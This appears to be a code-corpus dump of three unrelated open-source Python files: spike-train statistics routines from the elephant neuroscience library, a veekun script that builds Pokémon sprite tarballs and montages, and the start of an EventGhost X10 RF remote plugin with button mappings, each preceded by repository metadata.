r = r[2 * kernel.median_index(t_arr):-2 * (kernel(t_arr).size -
kernel.median_index(t_arr))]
t_start += kernel.median_index(t_arr) * spiketrain.units
t_stop -= (kernel(t_arr).size -
kernel.median_index(t_arr)) * spiketrain.units
rate = neo.AnalogSignal(signal=r.reshape(r.size, 1),
sampling_period=sampling_period,
units=pq.Hz, t_start=t_start, t_stop=t_stop)
return rate
def time_histogram(spiketrains, binsize, t_start=None, t_stop=None,
output='counts', binary=False):
"""
Time Histogram of a list of :attr:`neo.SpikeTrain` objects.
Parameters
----------
spiketrains : List of neo.SpikeTrain objects
Spiketrains with a common time axis (same `t_start` and `t_stop`)
binsize : quantities.Quantity
Width of the histogram's time bins.
t_start, t_stop : Quantity (optional)
Start and stop time of the histogram. Only events in the input
`spiketrains` falling between `t_start` and `t_stop` (both included)
are considered in the histogram. If `t_start` and/or `t_stop` are not
specified, the maximum `t_start` of all :attr:spiketrains is used as
`t_start`, and the minimum `t_stop` is used as `t_stop`.
Default: t_start = t_stop = None
output : str (optional)
Normalization of the histogram. Can be one of:
* `counts`'`: spike counts at each bin (as integer numbers)
* `mean`: mean spike counts per spike train
* `rate`: mean spike rate per spike train. Like 'mean', but the
counts are additionally normalized by the bin width.
binary : bool (optional)
If **True**, indicates whether all spiketrain objects should first
binned to a binary representation (using the `BinnedSpikeTrain` class
in the `conversion` module) and the calculation of the histogram is
based on this representation.
Note that the output is not binary, but a histogram of the converted,
binary representation.
Default: False
Returns
-------
time_hist : neo.AnalogSignal
A neo.AnalogSignal object containing the histogram values.
`AnalogSignal[j]` is the histogram computed between
`t_start + j * binsize` and `t_start + (j + 1) * binsize`.
See also
--------
elephant.conversion.BinnedSpikeTrain
"""
min_tstop = 0
if t_start is None:
# Find the internal range for t_start, where all spike trains are
# defined; cut all spike trains taking that time range only
max_tstart, min_tstop = conv._get_start_stop_from_input(spiketrains)
t_start = max_tstart
if not all([max_tstart == t.t_start for t in spiketrains]):
warnings.warn(
"Spiketrains have different t_start values -- "
"using maximum t_start as t_start.")
if t_stop is None:
# Find the internal range for t_stop
if min_tstop:
t_stop = min_tstop
if not all([min_tstop == t.t_stop for t in spiketrains]):
warnings.warn(
"Spiketrains have different t_stop values -- "
"using minimum t_stop as t_stop.")
else:
min_tstop = conv._get_start_stop_from_input(spiketrains)[1]
t_stop = min_tstop
if not all([min_tstop == t.t_stop for t in spiketrains]):
warnings.warn(
"Spiketrains have different t_stop values -- "
"using minimum t_stop as t_stop.")
sts_cut = [st.time_slice(t_start=t_start, t_stop=t_stop) for st in
spiketrains]
# Bin the spike trains and sum across columns
bs = conv.BinnedSpikeTrain(sts_cut, t_start=t_start, t_stop=t_stop,
binsize=binsize)
if binary:
bin_hist = bs.to_sparse_bool_array().sum(axis=0)
else:
bin_hist = bs.to_sparse_array().sum(axis=0)
# Flatten array
bin_hist = np.ravel(bin_hist)
# Renormalise the histogram
if output == 'counts':
# Raw
bin_hist = bin_hist * pq.dimensionless
elif output == 'mean':
# Divide by number of input spike trains
bin_hist = bin_hist * 1. / len(spiketrains) * pq.dimensionless
elif output == 'rate':
# Divide by number of input spike trains and bin width
bin_hist = bin_hist * 1. / len(spiketrains) / binsize
else:
raise ValueError('Parameter output is not valid.')
return neo.AnalogSignal(signal=bin_hist.reshape(bin_hist.size, 1),
sampling_period=binsize, units=bin_hist.units,
t_start=t_start)
def complexity_pdf(spiketrains, binsize):
"""
Complexity Distribution [1] of a list of :attr:`neo.SpikeTrain` objects.
Probability density computed from the complexity histogram which is the
histogram of the entries of the population histogram of clipped (binary)
spike trains computed with a bin width of binsize.
It provides for each complexity (== number of active neurons per bin) the
number of occurrences. The normalization of that histogram to 1 is the
probability density.
Parameters
----------
spiketrains : List of neo.SpikeTrain objects
Spiketrains with a common time axis (same `t_start` and `t_stop`)
binsize : quantities.Quantity
Width of the histogram's time bins.
Returns
-------
time_hist : neo.AnalogSignal
A neo.AnalogSignal object containing the histogram values.
`AnalogSignal[j]` is the histogram computed between .
See also
--------
elephant.conversion.BinnedSpikeTrain
References
----------
[1]Gruen, S., Abeles, M., & Diesmann, M. (2008). Impact of higher-order
correlations on coincidence distributions of massively parallel data.
In Dynamic Brain-from Neural Spikes to Behaviors (pp. 96-114).
Springer Berlin Heidelberg.
"""
# Computing the population histogram with parameter binary=True to clip the
# spike trains before summing
pophist = time_histogram(spiketrains, binsize, binary=True)
# Computing the histogram of the entries of pophist (=Complexity histogram)
complexity_hist = np.histogram(
pophist.magnitude, bins=range(0, len(spiketrains) + 2))[0]
# Normalization of the Complexity Histogram to 1 (probabilty distribution)
complexity_hist = complexity_hist / complexity_hist.sum()
# Convert the Complexity pdf to an neo.AnalogSignal
complexity_distribution = neo.AnalogSignal(
np.array(complexity_hist).reshape(len(complexity_hist), 1) *
pq.dimensionless, t_start=0 * pq.dimensionless,
sampling_period=1 * pq.dimensionless)
return complexity_distribution
"""Kernel Bandwidth Optimization.
Python implementation by Subhasis Ray.
Original matlab code (sskernel.m) here:
http://2000.jukuin.keio.ac.jp/shimazaki/res/kernel.html
This was translated into Python by Subhasis Ray, NCBS. Tue Jun 10
23:01:43 IST 2014
"""
def nextpow2(x):
""" Return the smallest integral power of 2 that >= x """
n = 2
while n < x:
n = 2 * n
return n
def fftkernel(x, w):
"""
y = fftkernel(x,w)
Function `fftkernel' applies the Gauss kernel smoother to an input
signal using FFT algorithm.
Input argument
x: Sample signal vector.
w: Kernel bandwidth (the standard deviation) in unit of
the sampling resolution of x.
Output argument
y: Smoothed signal.
MAY 5/23, 2012 Author Hideaki Shimazaki
RIKEN Brain Science Insitute
http://2000.jukuin.keio.ac.jp/shimazaki
Ported to Python: Subhasis Ray, NCBS. Tue Jun 10 10:42:38 IST 2014
"""
L = len(x)
Lmax = L + 3 * w
n = nextpow2(Lmax)
X = np.fft.fft(x, n)
f = np.arange(0, n, 1.0) / n
f = np.concatenate((-f[:int(n / 2)], f[int(n / 2):0:-1]))
K = np.exp(-0.5 * (w * 2 * np.pi * f)**2)
y = np.fft.ifft(X * K, n)
y = y[:L].copy()
return y
def logexp(x):
if x < 1e2:
y = np.log(1 + np.exp(x))
else:
y = x
return y
def ilogexp(x):
if x < 1e2:
y = np.log(np.exp(x) - 1)
else:
y = x
return y
def cost_function(x, N, w, dt):
"""
The cost function
Cn(w) = sum_{i,j} int k(x - x_i) k(x - x_j) dx - 2 sum_{i~=j} k(x_i - x_j)
"""
yh = np.abs(fftkernel(x, w / dt)) # density
# formula for density
C = np.sum(yh ** 2) * dt - 2 * np.sum(yh * x) * \
dt + 2 / np.sqrt(2 * np.pi) / w / N
C = C * N * N
# formula for rate
# C = dt*sum( yh.^2 - 2*yh.*y_hist + 2/sqrt(2*pi)/w*y_hist )
return C, yh
def sskernel(spiketimes, tin=None, w=None, bootstrap=False):
"""
Calculates optimal fixed kernel bandwidth.
spiketimes: sequence of spike times (sorted to be ascending).
tin: (optional) time points at which the kernel bandwidth is to be estimated.
w: (optional) vector of kernel bandwidths. If specified, optimal
bandwidth is selected from this.
bootstrap (optional): whether to calculate the 95% confidence
interval. (default False)
Returns
A dictionary containing the following key value pairs:
'y': estimated density,
't': points at which estimation was computed,
'optw': optimal kernel bandwidth,
'w': kernel bandwidths examined,
'C': cost functions of w,
'confb95': (lower bootstrap confidence level, upper bootstrap confidence level),
'yb': bootstrap samples.
Ref: Shimazaki, Hideaki, and Shigeru Shinomoto. 2010. Kernel
Bandwidth Optimization in Spike Rate Estimation. Journal of
Computational Neuroscience 29 (1-2):
171-82. doi:10.1007/s10827-009-0180-4.
"""
if tin is None:
time = np.max(spiketimes) - np.min(spiketimes)
isi = np.diff(spiketimes)
isi = isi[isi > 0].copy()
dt = np.min(isi)
tin = np.linspace(np.min(spiketimes),
np.max(spiketimes),
min(int(time / dt + 0.5), 1000)) # The 1000 seems somewhat arbitrary
t = tin
else:
time = np.max(tin) - np.min(tin)
spiketimes = spiketimes[(spiketimes >= np.min(tin)) &
(spiketimes <= np.max(tin))].copy()
isi = np.diff(spiketimes)
isi = isi[isi > 0].copy()
dt = np.min(isi)
if dt > np.min(np.diff(tin)):
t = np.linspace(np.min(tin), np.max(tin),
min(int(time / dt + 0.5), 1000))
else:
t = tin
dt = np.min(np.diff(tin))
yhist, bins = np.histogram(spiketimes, np.r_[t - dt / 2, t[-1] + dt / 2])
N = np.sum(yhist)
yhist = yhist / (N * dt) # density
optw = None
y = None
if w is not None:
C = np.zeros(len(w))
Cmin = np.inf
for k, w_ in enumerate(w):
C[k], yh = cost_function(yhist, N, w_, dt)
if C[k] < Cmin:
Cmin = C[k]
optw = w_
y = yh
else:
# Golden section search on a log-exp scale
wmin = 2 * dt
wmax = max(spiketimes) - min(spiketimes)
imax = 20 # max iterations
w = np.zeros(imax)
C = np.zeros(imax)
tolerance = 1e-5
phi = 0.5 * (np.sqrt(5) + 1) # The Golden ratio
a = ilogexp(wmin)
b = ilogexp(wmax)
c1 = (phi - 1) * a + (2 - phi) * b
c2 = (2 - phi) * a + (phi - 1) * b
f1, y1 = cost_function(yhist, N, logexp(c1), dt)
f2, y2 = cost_function(yhist, N, logexp(c2), dt)
k = 0
while (np.abs(b - a) > (tolerance * (np.abs(c1) + np.abs(c2))))\
and (k < imax):
if f1 < f2:
b = c2
c2 = c1
c1 = (phi - 1) * a + (2 - phi) * b
f2 = f1
f1, y1 = cost_function(yhist, N, logexp(c1), dt)
w[k] = logexp(c1)
C[k] = f1
optw = logexp(c1)
y = y1 / (np.sum(y1 * dt))
else:
a = c1
c1 = c2
c2 = (2 - phi) * a + (phi - 1) * b
f1 = f2
f2, y2 = cost_function(yhist, N, logexp(c2), dt)
w[k] = logexp(c2)
C[k] = f2
optw = logexp(c2)
y = y2 / np.sum(y2 * dt)
k = k + 1
# Bootstrap confidence intervals
confb95 = None
yb = None
if bootstrap:
nbs = 1000
yb = np.zeros((nbs, len(tin)))
for ii in range(nbs):
idx = np.floor(np.random.rand(N) * N).astype(int)
xb = spiketimes[idx]
y_histb, bins = np.histogram(
xb, np.r_[t - dt / 2, t[-1] + dt / 2]) / dt / N
yb_buf = fftkernel(y_histb, optw / dt).real
yb_buf = yb_buf / np.sum(yb_buf * dt)
yb[ii, :] = np.interp(tin, t, yb_buf)
ybsort = np.sort(yb, axis=0)
y95b = ybsort[np.floor(0.05 * nbs).astype(int), :]
y95u = ybsort[np.floor(0.95 * nbs).astype(int), :]
confb95 = (y95b, y95u)
ret = np.interp(tin, t, y)
return {'y': ret,
't': tin,
'optw': optw,
'w': w,
'C': C,
'confb95': confb95,
'yb': yb}
|
etorre/elephant
|
elephant/statistics.py
|
Python
|
bsd-3-clause
| 42,361
|
[
"Gaussian",
"NEURON"
] |
baa43cc7d84d723b9ce8a3491ccafd021b728e62f5f0b90bbd2c20f1833aaf94
|
#!/usr/bin/env python
# encoding: utf8
"""Script to create a bunch of tarballs and montages, made available on the
/dex/downloads page.
"""
from __future__ import division
from glob import glob
import math
import os, os.path
import pkg_resources
import re
import subprocess
from subprocess import PIPE
import sys
import tarfile
import gzip
from pokedex.db import connect
from pokedex.db.load import load
phi = (1 + 5 ** 0.5) / 2
# Find the spline-pokedex downloads dir as relative to this script; it's not a
# data dir, so pkg_resources isn't much help
this_dir, _ = os.path.split(__file__)
downloads_dir = os.path.abspath(
os.path.join(this_dir, '../splinext/pokedex/public/downloads')
)
# TODO this is stupid
media_dir = os.path.abspath(
os.path.join(this_dir, '../../pokedex-media.git')
)
assert media_dir
def create_downloads():
# Gotta chdir to get the gzip header right; see Python bug 4750
os.chdir(downloads_dir)
# The database
db_filename = os.path.join(downloads_dir, 'veekun-pokedex.sqlite')
session = connect('sqlite:///' + db_filename)
load(session, drop_tables=True, verbose=True, safe=False)
session.close()
db_gz = gzip.open(db_filename + '.gz', 'wb')
with open(db_filename, 'rb') as source:
db_gz.write(source.read())
db_gz.close() # XXX: 'with' context manager support is in Python 2.7
os.unlink(db_filename)
# Per-generation Pokémon tarballs
main_tarball('generation-1.tar.gz', ['red-green', 'red-blue', 'yellow'])
main_tarball('generation-2.tar.gz', ['gold', 'silver', 'crystal'])
main_tarball('generation-3.tar.gz', ['ruby-sapphire', 'emerald', 'firered-leafgreen'])
main_tarball('generation-4.tar.gz', ['diamond-pearl', 'platinum', 'heartgold-soulsilver'])
main_tarball('generation-5.tar.gz', ['black-white'])
# Other Pokémon stuff
make_tarball('overworld.tar.gz', ['pokemon/overworld'])
make_tarball('pokemon-cries.tar.gz', ['pokemon/cries'])
make_tarball('pokemon-sugimori.tar.gz', ['pokemon/sugimori'])
make_tarball('pokemon-footprints.tar.gz', ['pokemon/footprints'])
make_tarball('pokemon-trozei.tar.gz', ['pokemon/trozei'])
make_tarball('pokemon-icons.tar.gz', ['pokemon/icons'])
make_tarball('pokemon-conquest.tar.gz', ['pokemon/conquest'])
make_tarball('pokemon-dream-world.tar.gz', ['pokemon/dream-world'])
make_tarball('pokemon-global-link.tar.gz', ['pokemon/global-link'])
# Not Pokémon at all!
make_tarball('chrome.tar.gz', ['chrome', 'ribbons'])
make_tarball('items.tar.gz', ['items'])
# Bunch o' montages
main_montage('red-green.png', 'red-green/gray/{0}.png', 56, 151)
main_montage('red-green-sgb.png', 'red-green/{0}.png', 56, 151)
main_montage('red-blue.png', 'red-blue/gray/{0}.png', 56, 151)
main_montage('red-blue-sgb.png', 'red-blue/{0}.png', 56, 151)
main_montage('yellow.png', 'yellow/gray/{0}.png', 56, 151)
main_montage('yellow-sgb.png', 'yellow/{0}.png', 56, 151)
main_montage('yellow-gbc.png', 'yellow/gbc/{0}.png', 56, 151)
main_montage('generation-1-back.png',
'red-blue/back/gray/{0}.png', 32, 151)
main_montage('red-green-blue-back-sgb.png',
'red-blue/back/{0}.png', 32, 151)
main_montage('yellow-back-sgb.png', 'yellow/back/{0}.png', 32, 151)
main_montage('yellow-back-gbc.png', 'yellow/back/gbc/{0}.png', 32, 151)
main_montage('gold.png', 'gold/{0}.png', 56, 251)
main_montage('gold-shiny.png', 'gold/shiny/{0}.png', 56, 251)
main_montage('silver.png', 'silver/{0}.png', 56, 251)
main_montage('silver-shiny.png', 'silver/shiny/{0}.png', 56, 251)
main_montage('crystal.png', 'crystal/{0}.png', 56, 251)
main_montage('crystal-shiny.png', 'crystal/shiny/{0}.png', 56, 251)
main_montage('gold-silver-back.png',
'silver/back/{0}.png', 48, 251)
main_montage('gold-silver-back-shiny.png',
'silver/back/shiny/{0}.png', 48, 251)
main_montage('crystal-back.png',
'crystal/back/{0}.png', 48, 251)
main_montage('crystal-back-shiny.png',
'crystal/back/shiny/{0}.png', 48, 251)
main_montage('generation-3.png',
'ruby-sapphire/{0}.png', 64, 386, transparent=True)
main_montage('generation-3-shiny.png',
'ruby-sapphire/shiny/{0}.png', 64, 386, transparent=True)
main_montage('emerald-frame2.png',
'emerald/frame2/{0}.png', 64, 386, transparent=True)
main_montage('emerald-frame2-shiny.png',
'emerald/shiny/frame2/{0}.png', 64, 386, transparent=True)
main_montage('firered-leafgreen.png',
'firered-leafgreen/{0}.png', 64, 151, transparent=True)
main_montage('firered-leafgreen-shiny.png',
'firered-leafgreen/shiny/{0}.png', 64, 151, transparent=True)
main_montage('generation-3-back.png',
'ruby-sapphire/back/{0}.png', 64, 386, transparent=True)
main_montage('generation-3-back-shiny.png',
'ruby-sapphire/back/shiny/{0}.png', 64, 386, transparent=True)
main_montage('firered-leafgreen-back.png',
'firered-leafgreen/back/{0}.png', 64, 151, transparent=True)
main_montage('firered-leafgreen-back-shiny.png',
'firered-leafgreen/back/shiny/{0}.png', 64, 151, transparent=True)
main_montage('diamond-pearl.png',
'diamond-pearl/{0}.png', 80, 493, transparent=True)
main_montage('diamond-pearl-shiny.png',
'diamond-pearl/shiny/{0}.png', 80, 493, transparent=True)
main_montage('diamond-pearl-frame2.png',
'diamond-pearl/frame2/{0}.png', 80, 493, transparent=True)
main_montage('diamond-pearl-shiny-frame2.png',
'diamond-pearl/shiny/frame2/{0}.png', 80, 493, transparent=True)
main_montage('platinum.png',
'platinum/{0}.png', 80, 493, transparent=True)
main_montage('platinum-shiny.png',
'platinum/shiny/{0}.png', 80, 493, transparent=True)
main_montage('platinum-frame2.png',
'platinum/frame2/{0}.png', 80, 493, transparent=True)
main_montage('platinum-shiny-frame2.png',
'platinum/shiny/frame2/{0}.png', 80, 493, transparent=True)
main_montage('heartgold-soulsilver.png',
'heartgold-soulsilver/{0}.png', 80, 493, transparent=True)
main_montage('heartgold-soulsilver-shiny.png',
'heartgold-soulsilver/shiny/{0}.png', 80, 493, transparent=True)
main_montage('heartgold-soulsilver-frame2.png',
'heartgold-soulsilver/frame2/{0}.png', 80, 493, transparent=True)
main_montage('heartgold-soulsilver-shiny-frame2.png',
'heartgold-soulsilver/shiny/frame2/{0}.png', 80, 493, transparent=True)
main_montage('diamond-pearl-back.png',
'diamond-pearl/back/{0}.png', 80, 493, transparent=True)
main_montage('diamond-pearl-back-shiny.png',
'diamond-pearl/back/shiny/{0}.png', 80, 493, transparent=True)
main_montage('platinum-back.png',
'platinum/back/{0}.png', 80, 493, transparent=True)
main_montage('platinum-back-shiny.png',
'platinum/back/shiny/{0}.png', 80, 493, transparent=True)
main_montage('platinum-back-frame2.png',
'platinum/back/frame2/{0}.png', 80, 493, transparent=True)
main_montage('platinum-back-shiny-frame2.png',
'platinum/back/shiny/frame2/{0}.png', 80, 493, transparent=True)
main_montage('heartgold-soulsilver-back.png',
'heartgold-soulsilver/back/{0}.png', 80, 493, transparent=True)
main_montage('heartgold-soulsilver-back-shiny.png',
'heartgold-soulsilver/back/shiny/{0}.png', 80, 493, transparent=True)
main_montage('heartgold-soulsilver-back-frame2.png',
'heartgold-soulsilver/back/frame2/{0}.png', 80, 493, transparent=True)
main_montage('heartgold-soulsilver-back-shiny-frame2.png',
'heartgold-soulsilver/back/shiny/frame2/{0}.png', 80, 493, transparent=True)
main_montage('black-white.png',
'black-white/{0}.png', 96, 649, transparent=True)
main_montage('black-white-shiny.png',
'black-white/shiny/{0}.png', 96, 649, transparent=True)
main_montage('black-white-back.png',
'black-white/back/{0}.png', 96, 649, transparent=True)
main_montage('black-white-back-shiny.png',
'black-white/back/shiny/{0}.png', 96, 649, transparent=True)
# And female montages, which are a little different
make_diff_montage(
filename='diamond-pearl-female-diff.png',
other_filename='diamond-pearl.png',
pattern='pokemon/main-sprites/diamond-pearl/female/{0}.png',
fallback_pattern='pokemon/main-sprites/diamond-pearl/{0}.png',
sprite_size=80,
pokemon=493,
)
make_diff_montage(
filename='platinum-female-diff.png',
other_filename='platinum.png',
pattern='pokemon/main-sprites/platinum/female/{0}.png',
fallback_pattern='pokemon/main-sprites/platinum/{0}.png',
sprite_size=80,
pokemon=493,
)
make_diff_montage(
filename='heartgold-soulsilver-female-diff.png',
other_filename='heartgold-soulsilver.png',
pattern='pokemon/main-sprites/heartgold-soulsilver/female/{0}.png',
fallback_pattern='pokemon/main-sprites/heartgold-soulsilver/{0}.png',
sprite_size=80,
pokemon=493,
)
make_diff_montage(
filename='black-white-female-diff.png',
other_filename='black-white.png',
pattern='pokemon/main-sprites/black-white/female/{0}.png',
fallback_pattern='pokemon/main-sprites/black-white/{0}.png',
sprite_size=96,
pokemon=649,
)
make_diff_montage(
filename='diamond-pearl-back-female-diff.png',
other_filename='diamond-pearl-back.png',
pattern='pokemon/main-sprites/diamond-pearl/back/female/{0}.png',
fallback_pattern='pokemon/main-sprites/diamond-pearl/back/{0}.png',
sprite_size=80,
pokemon=493,
)
make_diff_montage(
filename='platinum-back-female-diff.png',
other_filename='platinum-back.png',
pattern='pokemon/main-sprites/platinum/back/female/{0}.png',
fallback_pattern='pokemon/main-sprites/platinum/back/{0}.png',
sprite_size=80,
pokemon=493,
)
make_diff_montage(
filename='heartgold-soulsilver-back-female-diff.png',
other_filename='heartgold-soulsilver-back.png',
pattern='pokemon/main-sprites/heartgold-soulsilver/back/female/{0}.png',
fallback_pattern='pokemon/main-sprites/heartgold-soulsilver/back/{0}.png',
sprite_size=80,
pokemon=493,
)
make_diff_montage(
filename='black-white-back-female-diff.png',
other_filename='black-white-back.png',
pattern='pokemon/main-sprites/black-white/back/female/{0}.png',
fallback_pattern='pokemon/main-sprites/black-white/back/{0}.png',
sprite_size=96,
pokemon=649,
)
# Overworld
make_montage('overworld-right.png',
'pokemon/overworld/right/{0}.png', 32, 493, transparent=True)
make_montage('overworld-down.png',
'pokemon/overworld/down/{0}.png', 32, 493, transparent=True)
make_montage('overworld-up.png',
'pokemon/overworld/up/{0}.png', 32, 493, transparent=True)
make_montage('overworld-right-shiny.png',
'pokemon/overworld/shiny/right/{0}.png', 32, 493, transparent=True)
make_montage('overworld-down-shiny.png',
'pokemon/overworld/shiny/down/{0}.png', 32, 493, transparent=True)
make_montage('overworld-up-shiny.png',
'pokemon/overworld/shiny/up/{0}.png', 32, 493, transparent=True)
# Other miscellaneous
make_montage('footprints.png', 'pokemon/footprints/{0}.png', 16, 649)
make_montage('sugimori.png', 'pokemon/sugimori/{0}.png', 96, 493,
padding=2, filter='lanczos')
make_montage('conquest.png', 'pokemon/conquest/{0}.png', 128, None,
transparent=True)
make_labeled_montage(
'items.png', 'items', suffix='.png',
sprite_size=24, horiz_padding=36, vert_padding=6,
)
make_labeled_montage(
'berries.png', 'items/berries', suffix='.png',
sprite_size=48, horiz_padding=36, vert_padding=4,
)
def main_tarball(filename, contents):
"""As make_tarball, but prepends pokemon/main-sprites/ to all contents
"""
make_tarball(filename, ['pokemon/main-sprites/' + c for c in contents])
def make_tarball(filename, contents):
"""Packs `contents` into the tar file `filename`."""
print "Generating", filename + "...",
sys.stdout.flush()
tar = tarfile.open(filename, 'w:gz')
for content in contents:
tar.add(os.path.join(media_dir, content), arcname=content)
tar.close()
print "ok"
def main_montage(filename, pattern, *args, **kwargs):
"""As make_montage, but prepends pokemon/main-sprites/ to pattern
"""
make_montage(filename, 'pokemon/main-sprites/' + pattern, *args, **kwargs)
def make_montage(filename, pattern, sprite_size, pokemon=None,
padding=0, filter='point', transparent=False):
u"""Creates a montage in `filename` out of PNG images matching `pattern`,
which should be a str.format pattern. `sprite_size` is the size of each
sprite, for calculating the dimensions of the final product, and `pokemon`
is the number of Pokémon that should be in the resulting image.
`pokemon` being None means "all of them", for sidegames that include a
haphazard selection of Pokémon, e.g. Pokémon Conquest.
The background will be transparent iff `transparent` is true.
"""
print "Generating", filename + "...",
sys.stdout.flush()
transparent_switches = []
if transparent:
transparent_switches = ['-background', 'transparent']
# Find all the files we want
if pokemon is None:
files = glob(os.path.join(media_dir, pattern.format('*')))
# Filter out alternate forms to avoid duplicates
files = [name for name in files if '-' not in os.path.basename(name)]
files.sort(key=natural_sort_key)
else:
files = [
os.path.join(media_dir, pattern.format(n))
for n in range(1, pokemon + 1)
]
# Figure out the dimensions of the image. Try to keep to the golden ratio,
# because it rocks.
# Thus: rows * (phi * rows) = pokemon
rows = int(math.ceil( (len(files) / phi) ** 0.5 ))
outfile = os.path.join(downloads_dir, filename)
subprocess.Popen(
['montage',
'-filter', filter,
'-geometry', "{0}x{0}+{1}+{1}>".format(sprite_size, padding),
'-tile', "x{0}".format(rows),
]
+ files
+ transparent_switches
+ [outfile]
).wait()
# Optipng it
subprocess.Popen(['optipng', '-quiet', outfile]).wait()
print "ok"
def make_diff_montage(filename, other_filename, pattern, fallback_pattern,
sprite_size, pokemon):
u"""Similar to `make_montage`, except! This version assumes `pattern`
refers to a file that may or may not exist, and `fallback_pattern` fills in
the gaps. Also it then diffs the generated image with `other_filename`.
"""
print "Generating", filename + "...",
sys.stdout.flush()
# Find all the files we want
files = []
for n in range(1, pokemon + 1):
img = os.path.join(media_dir, pattern.format(n))
if os.path.exists(img):
files.append(img)
else:
files.append(
os.path.join(media_dir, fallback_pattern.format(n)))
# Golden ratio blah blah
rows = int(math.ceil( (pokemon / phi) ** 0.5 ))
outfile = os.path.join(downloads_dir, filename)
subprocess.Popen(
['montage',
'-background', 'transparent',
'-geometry', "{0}x{0}+0+0>".format(sprite_size),
'-tile', "x{0}".format(rows),
]
+ files
+ [outfile]
).wait()
# Do the comparison in-place
subprocess.Popen([
'compare',
outfile, os.path.join(downloads_dir, other_filename),
outfile,
]).wait()
# Optipng it
subprocess.Popen(['optipng', '-quiet', outfile]).wait()
print "ok"
def make_labeled_montage(filename, directory, suffix,
sprite_size, horiz_padding, vert_padding):
u"""Makes a montage, with labels, of the files in the named directory.
Only files ending in `suffix` will be used, and the suffix will be removed.
The rest is a bunch of boring math.
"""
print "Generating", filename + "...",
sys.stdout.flush()
# Find all the files we want
s = len(suffix)
file_args = []
file_count = 0
filenames = os.listdir(os.path.join(media_dir, directory))
filenames.sort()
for img in filenames:
if not img.endswith(suffix):
continue
# Cut off .png
label = img[:-s]
file_args.extend([
'-label',
label,
os.path.join(media_dir, directory, img),
])
file_count += 1
# Golden ratio blah blah. Except with the padding it becomes...
tile_h = sprite_size + vert_padding * 2 + 16 # 16 for label height
tile_w = sprite_size + horiz_padding * 2
# tile_h * rows * phi == tile_w * (n / rows)
# => rows = sqrt((tile_w * n) / (tile_h * phi)
rows = int(math.ceil(
((tile_w * file_count) / (tile_h * phi)) ** 0.5
))
outfile = os.path.join(downloads_dir, filename)
subprocess.Popen(
['montage',
'-background', 'transparent',
'-geometry', "+{0}+{1}".format(horiz_padding, vert_padding),
'-tile', "x{0}".format(rows),
]
+ file_args
+ [outfile]
).wait()
# Optipng it
subprocess.Popen(['optipng', '-quiet', outfile]).wait()
print "ok"
def natural_sort_key(filename):
groups = re.findall('\d+|\D+', filename)
groups = [(int(group) if group.isdigit() else group) for group in groups]
return groups
if __name__ == '__main__':
create_downloads()
|
veekun/spline-pokedex
|
bin/create-downloads.py
|
Python
|
mit
| 18,338
|
[
"CRYSTAL"
] |
fd98f62d19aaf4c692de2a2091417c3c26333ae1d96333d0f4396c4de334adc7
|
# -*- coding: utf-8 -*-
#
# This file is a plugin for EventGhost.
# Copyright © 2005-2019 EventGhost Project <http://www.eventghost.net/>
#
# EventGhost is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation, either version 2 of the License, or (at your option)
# any later version.
#
# EventGhost is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along
# with EventGhost. If not, see <http://www.gnu.org/licenses/>.
"""<rst>
Hardware plugin for X10 compatible RF remotes.
This includes remotes like:
* `ATI Remote Wonder
<http://www.ati.com/products/remotewonder/index.html>`_
* `ATI Remote Wonder PLUS
<http://www.ati.com/products/remotewonderplus/index.html>`_
* `SnapStream Firefly
<http://www.snapstream.com/products/firefly/>`_
* `NVIDIA Personal Cinema Remote
<http://www.nvidia.com/object/feature_PC_remote.html>`_
* `Marmitek PC Control
<http://www.marmitek.com/>`_
* `Pearl Q-Sonic Master Remote 6in1
<http://www.pearl.de/product.jsp?pdid=PE4444&catid=1601&vid=916&curr=DEM>`_
* `Niveus PC Remote Control
<http://www.niveusmedia.com/>`_
* Medion RF Remote Control
* Packard Bell RF MCE Remote Control OR32E
"""
import eg
eg.RegisterPlugin(
name = "X10 Remote",
author = "Bitmonster",
version = "1.0",
kind = "remote",
hardwareId = "USB\\VID_0BC7&PID_0006",
guid = "{C3E96757-E507-4CC3-A2E6-465D48B87D09}",
canMultiLoad = True,
description = __doc__,
url = "http://www.eventghost.net/forum/viewtopic.php?t=1589",
icon = (
"iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAYklEQVR42mNkoBAwwhgq"
"uf//k6LxzmRGRrgBpGpGNoSRXM1wL1DFgNuTGBhU8xCCyHx0Ngggq4W7AKYQlwZchqJ4"
"Ad0l+AymvgHYFBJtAFUCkaJopMgAEEFRUoZxKMpMlAAAoBBdp8TBL7gAAAAASUVORK5C"
"YII="
),
)
import wx
from win32com.client import DispatchWithEvents
class Text:
allButton = "&All"
noneButton = "&None"
remoteBox = "Remote type:"
idBox = "Active IDs:"
usePrefix = "Event prefix:"
errorMesg = "No X10 receiver found!"
REMOTES = [
[
"ATI Remote Wonder",
{
'One': 'Num1',
'Two': 'Num2',
'Three': 'Num3',
'Four': 'Num4',
'Five': 'Num5',
'Six': 'Num6',
'Seven': 'Num7',
'Eight': 'Num8',
'Nine': 'Num9',
'Zero': 'Num0',
'MouseUp': 'Mouse000',
'MouseRightUp': 'Mouse045',
'MouseRight': 'Mouse090',
'MouseRightDown': 'Mouse135',
'MouseDown': 'Mouse180',
'MouseLeftDown': 'Mouse225',
'MouseLeft': 'Mouse270',
'MouseLeftUp': 'Mouse315',
'MTAddDelete': 'Menu',
'MTAB': 'Check',
}
],
[
"Medion",
{
'MTTV': 'TV',
'MTVCR': 'VCR',
'Book': 'Music',
'MTRadio': 'Radio',
'Web': 'Photo',
'MTPC': 'TVPreview',
'MTChannelList': 'ChannelList',
'D': 'Setup',
'MTAlbum': 'VideoDesktop',
'VolumeUp': 'VolumeDown',
'VolumeDown': 'VolumeUp',
'A': 'Mute',
'MTArtist': 'Red',
'MTGenre': 'Green',
'MTTrack': 'Yellow',
'MTUp': 'Blue',
'MTAddDelete': 'TXT',
'One': 'Num1',
'Two': 'Num2',
'Three': 'Num3',
'Four': 'Num4',
'Five': 'Num5',
'Six': 'Num6',
'Seven': 'Num7',
'Eight': 'Num8',
'Nine': 'Num9',
'Zero': 'Num0',
'Bookmark': 'ChannelSearch',
'Resize': 'Delete',
'MTLeft': 'Rename',
'MTAB': 'Snapshot',
'MTDown': 'AcquireImage',
'MTRight': 'EditImage',
'E': 'PreviousTrack',
'F': 'NextTrack',
